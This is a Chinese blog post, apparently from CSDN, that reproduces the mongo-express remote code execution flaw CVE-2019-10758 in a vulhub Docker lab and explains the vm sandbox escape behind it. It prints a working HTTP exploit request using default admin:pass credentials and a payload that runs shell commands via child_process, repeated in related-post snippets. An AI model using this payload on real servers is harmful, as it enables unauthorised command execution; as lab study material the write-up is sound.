mongo-express 代码执行 (cve-2019-10758)

最新推荐文章于 2023-08-14 16:18:41 发布
最新推荐文章于 2023-08-14 16:18:41 发布
阅读量799 收藏
点赞数
分类专栏: 渗透测试实验 文章标签: github docker git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/122133891
版权

1.环境搭建

项目地址:

vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com)

拉取项目:

git clone https://github.com.cnpmjs.org/vulhub/vulhub.git

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224172635.png)]

安装docker-compose:

curl -L https://github.com/docker/compose/releases/download/1.27.4/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
chmod 775 docker-compose

回到项目的目录

docker-compose up -d

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aLzMjoxL-1640341732205)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224174132.png)]

浏览器访问192.168.2.101:8081

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B9XmvyS7-1640341732207)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224174928.png)]

2.漏洞利用

POC如下:

POST /checkValid HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch  /tmp/hummer")

抓包,修改http头重放即可执行命令

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zTA2WYoU-1640341732208)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224175548.png)]

查看结果:

3.漏洞分析

在toBSON函数中,参数string被放进vm沙箱中eval,Vm 模块提供了用于在 v8虚拟机上下文中编译和运行代码的 api。使用 VM 模块可以在沙箱环境中运行代码。沙箱代码使用不同的 v8上下文,这意味着它具有不同于代码其余部分的全局对象。vm在利用漏洞的时候逃逸出vm沙箱即可执行任意命令。

关于vm沙箱详细信息参考Sandboxing NodeJS is hard, here is why (pwnisher.gitlab.io)

toBSON函数的参数来源于req.body.document

所以我么构造的POC如下:

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/hummmer")

参考:

CVE-2019-10758:mongo-expressRCE复现分析 - 先知社区 (aliyun.com)

Hummer-200
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mongo-express 远程代码执行漏洞(CVE-2019-10758
EC_Carrot的博客
07-13 552
漏洞复现 如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码 直接发送如下数据包,即可执行代码this.constructor.constructor("return process"().mainModule.require("child_process").execSync("touch /tmp/success") POST /checkValid HTTP/1.1 Host: your-ip Accept-Encoding: gzi
mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)
negnegil的博客
09-07 2639
mongo-express mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写 漏洞介绍 在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码 复现环境 mongo-express 0.53.0 MongoDB Version 3.4.24 漏洞环境搭建 采用github开源docker漏洞环境搭建而成 项目地址: https:/
Mongo-Express RCE(CVE-2019-10758)复现排查
最新发布
dayouzi的博客
08-14 512
Mongo-express是的管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。
mongo-express 代码执行cve-2019-10758
weixin_48817799的博客
12-30 1170
文章目录前言一、复现过程总结 前言 名称: mongo-express 代码执行cve-2019-10758) 描述: mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 提示:以下是本篇文章正文内容,下面案例可供参考 一、复现过程 1.老样子,fofa靶场http://vulfocus.fofa.so 信息提示如下 2.页面.
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1230
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
cve-2019-10758 mongo-express rce 漏洞分析
whatday的专栏
06-14 1394
下面是对漏洞的描述: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses thetoBSONmethod. A misuse of thevmdependency to performexeccommands in a non-safe environment. 环境搭建 漏洞复现需要准备的环境有: MongoDB node & npm mon...
CVE-2019-10758mongo-express 远程代码执行漏洞复现
Beret-81的博客
06-18 595
mongo-express 远程代码执行漏洞漏洞描述漏洞环境漏洞复现 漏洞描述 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 漏洞环境 环境搭建:https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 执行如下命令启动一个0.53.0版本的mo
mongo-mongo-express-k8s:一个用于MongoDB和Mongo Express的Kubernetes配置项目
02-15
Kubernetes上的Mongo 这是一个Kubernetes配置项目,用于部署和运行MongoDB和... 配置为Opaque类型的Mongo秘密配置文件,其中包含mongo-root-username和mongo-root-password kubectl apply -f deploy/mongo/secrets.y
mongo-express-node-generator:mongo-express-node代码生成器
03-16
mongo-express-node-generator:mongo-express-node代码生成器
CVE-2019-10758
03-08
CVE-2019-10758 PoC 设置 docker run -p 27017:27017 -d mongo npm install mongo-express@0.53.0 cd node_modules/mongo-express/ && node app.js cURL利用 curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")' 脚本
mongo-express:基于Web的MongoDB管理界面,使用Node.js编写并表达
02-03
mongo-express 使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB管理界面 产品特点 连接到多个数据库 查看/添加/删除数据库 查看/添加/重命名/删除收藏集 查看/添加/更新/删除文档 在集合视图中内联预览...
mongo-express-mongodb-k8s:Kubernetes配置文件,用于部署与mongodb容器通信的mongo-express容器
03-25
mongo-express-mongodb-k8s:Kubernetes配置文件,用于部署与mongodb容器通信的mongo-express容器
cf-mongo-express:mongo-express包装器,用于云铸造
05-22
欢迎来到cf-mongo-express 概述 这需要 express-用Node.js和express编写的基于Web的MongoDB管理界面。 Cloud Foundry部署包装器。 开始吧 克隆此存储库。 git clone ...
mongo-go-examples:mongo-go-driver示例
02-04
2019/02/25:替换为go.mongodb.org/mongo-driver(v1.0.0-rc1) 使用MongoDB Change Streams实现。 mongo-go-driver示例 可以在找到。 骨料 $组 $ redact $过滤器 $ lookup $ elemMatch 更改流 欺诈 运行命令 ...
mongo-express 远程代码执行漏洞 CVE-2019-10758 漏洞复现
ADummy的博客
03-04 429
mongo-express 远程代码执行漏洞(CVE-2019-10758) by ADummy 0x00利用路线 ​ Burpsuite发包—>命令执行 0x01漏洞介绍 ​ mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 0x 02漏洞复现 ...
vulhub漏洞复现40_Mongo-express
weixin_44193247的博客
02-09 394
vulhub漏洞复现练习篇
mongo-express 远程代码执行漏洞复现
Tauil的博客
07-30 980
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。
mongo --out
08-10
- *1* [Java操作MongoDB使用mongo-java-driver](https://blog.csdn.net/jinxilongjxl/article/details/108734824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值